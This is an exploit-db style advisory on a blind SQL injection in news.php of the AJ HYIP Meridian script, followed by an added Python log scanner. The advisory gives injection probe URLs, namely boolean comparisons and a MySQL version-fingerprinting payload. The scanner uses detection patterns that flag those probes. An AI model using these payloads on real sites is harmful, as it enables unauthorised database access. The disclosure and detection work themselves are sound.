AJ HYIP MERIDIAN – ‘news.php?id’ Blind SQL Injection

  • Author: JosS
    Date: 2010-07-22
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/14436/
  • AJ HYIP MERIDIAN (news.php id) Blind SQL Injection Vulnerability
    bug found by Jose Luis Gongora Fernandez (a.k.a) JosS
    
    contact: sys-project[at]hotmail.com
    website: http://www.hack0wn.com/
    
    - site: http://www.ajsquare.com/products/ajhyip/index.php
    
    - about AJ HYIP:
    
    AJ HYIP is a complete financial tool with no technical 
    knowledge required to manage the site. AJ HYIP software 
    is the latest and most advanced HYIP Script with excellent 
    navigation features. Our HYIP Script can be easily customized 
    to accustom your needs with a potential to generate heavy revenues.
    
    
    ~~ [POC]
    
    http://target/path/news.php?id=1 [bSQL]
    http://target/path/news.php?id=1 and 1=1
    http://target/path/news.php?id=1 and 1=2
    
    ~~ [DEMO]
    
    http://server/meridian/news.php?id=1 and substring(@@version,1,1)=4
    http://server/meridian/news.php?id=1 and substring(@@version,1,1)=5
    
    
     __h0__
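
Added example, not part of the original advisory: a Python log check that flags requests to news.php whose id parameter is not a plain integer and labels the boolean and @@version probes shown in the POC and DEMO sections. The log lines, paths and addresses are constructed, and the combined access-log format is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Patterns modelled on the advisory's POC and DEMO requests.
BOOLEAN_PROBE = re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+", re.I)
VERSION_PROBE = re.compile(r"substring\s*\(\s*@@version", re.I)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')

# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [22/Jul/2010:10:00:01 +0000] "GET /meridian/news.php?id=1 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [22/Jul/2010:10:00:05 +0000] "GET /meridian/news.php?id=1%20and%201=1 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [22/Jul/2010:10:00:06 +0000] "GET /meridian/news.php?id=1%20and%201=2 HTTP/1.1" 200 1870',
    '192.0.2.44 - - [22/Jul/2010:10:00:09 +0000] "GET /meridian/news.php?id=1+and+substring(@@version,1,1)=5 HTTP/1.1" 200 5120',
    '192.0.2.10 - - [22/Jul/2010:10:00:12 +0000] "GET /meridian/index.php?id=abc HTTP/1.1" 200 900',
]

def classify_id(value):
    """Return None for a plain integer id, else a label for the anomaly."""
    if re.fullmatch(r"\d+", value):
        return None
    if VERSION_PROBE.search(value):
        return "version-fingerprint"
    if BOOLEAN_PROBE.search(value):
        return "boolean-probe"
    return "non-numeric-id"

def scan(lines):
    """Return (line number, label, decoded id) for suspicious news.php hits."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.lower().endswith("/news.php"):
            continue
        for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
            value = value.strip()  # parse_qs has already URL-decoded it
            label = classify_id(value)
            if label:
                findings.append((lineno, label, value))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Paired boolean-probe hits from one client with differing response sizes, as in the second and third sample lines, are the signature of the true/false comparison the POC relies on.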